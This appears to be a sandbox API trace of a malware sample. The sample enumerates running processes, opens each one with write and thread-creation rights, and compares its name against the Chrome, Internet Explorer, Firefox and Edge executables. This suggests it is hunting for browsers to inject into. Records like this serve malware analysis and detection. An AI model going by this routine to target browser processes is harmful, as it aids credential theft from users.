	[0244.053] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.053] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0244.053] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.053] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.054] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.054] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0244.054] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.054] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.054] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.055] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x8e1c
	[0244.055] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.055] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0244.055] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.055] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.056] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.056] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0244.056] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.056] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.056] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.057] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x8e20
	[0244.057] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.057] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0244.058] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.058] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.058] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.058] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0244.058] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.058] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.058] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.059] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x8e24
	[0244.059] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.059] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0244.060] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.060] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.060] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.060] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0244.060] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.060] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.061] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.061] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x8e28
	[0244.062] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.062] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0244.062] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.062] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.062] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.062] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0244.063] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.063] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.064] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.064] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x8e2c
	[0244.065] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.065] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0244.065] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.065] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.065] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.065] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0244.066] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.066] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.066] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.067] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x8e30
	[0244.067] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.067] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0244.067] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.067] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.067] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.067] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0244.068] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.068] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.068] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.069] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x8e34
	[0244.069] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.069] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0244.069] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.069] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.070] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.070] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0244.070] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.070] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.071] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0244.072] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x8e38
	[0244.072] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.072] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0244.072] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.072] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.073] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.073] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0244.073] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.073] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.073] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.074] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x8e3c
	[0244.074] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.074] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0244.075] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.075] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.075] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.075] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0244.075] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.075] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.075] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0244.076] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x8e40
	[0244.076] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.076] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0244.077] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.077] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.077] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.077] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0244.077] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.077] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.078] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0244.098] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x8e44
	[0244.099] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.099] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0244.099] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.099] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.099] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.099] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0244.100] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.100] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.100] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.101] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x8e48
	[0244.101] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.101] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0244.101] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.101] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.101] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.101] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0244.102] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.102] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.102] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0244.103] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x8e4c
	[0244.103] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.103] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0244.103] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.103] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.104] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.104] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0244.104] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.104] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.104] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0244.105] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x8e50
	[0244.105] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.105] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0244.106] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.106] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.106] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.106] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0244.106] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.106] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.106] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0244.107] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x8e54
	[0244.107] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.107] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0244.108] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.108] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.108] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.108] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0244.108] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.108] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.108] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0244.109] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x8e58
	[0244.110] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.110] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0244.110] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.110] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.111] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.111] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0244.111] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.111] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.111] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0244.112] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0244.112] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0244.113] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x8e5c
	[0244.113] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.113] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0244.114] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.114] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.114] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.114] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0244.115] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.115] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.115] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0244.116] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x8e60
	[0244.116] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.116] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0244.117] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.117] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.117] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.117] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0244.117] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.117] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.118] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0244.118] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x8e64
	[0244.118] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.118] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0244.119] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.119] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.119] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.119] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0244.119] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.119] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.120] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0244.120] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x8e68
	[0244.121] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.121] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0244.121] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.121] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.121] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.121] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0244.122] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.122] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.122] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0244.123] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x8e6c
	[0244.123] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.123] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0244.123] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.124] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.124] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.124] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0244.125] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.125] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.125] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0244.127] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x8e70
	[0244.127] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.127] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0244.127] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.127] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.128] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.128] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0244.128] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.128] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.128] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0244.129] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x8e74
	[0244.129] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.129] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0244.129] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.130] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.130] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.130] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0244.130] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.130] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.131] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0244.132] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x8e78
	[0244.132] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.132] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0244.132] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.132] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.133] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
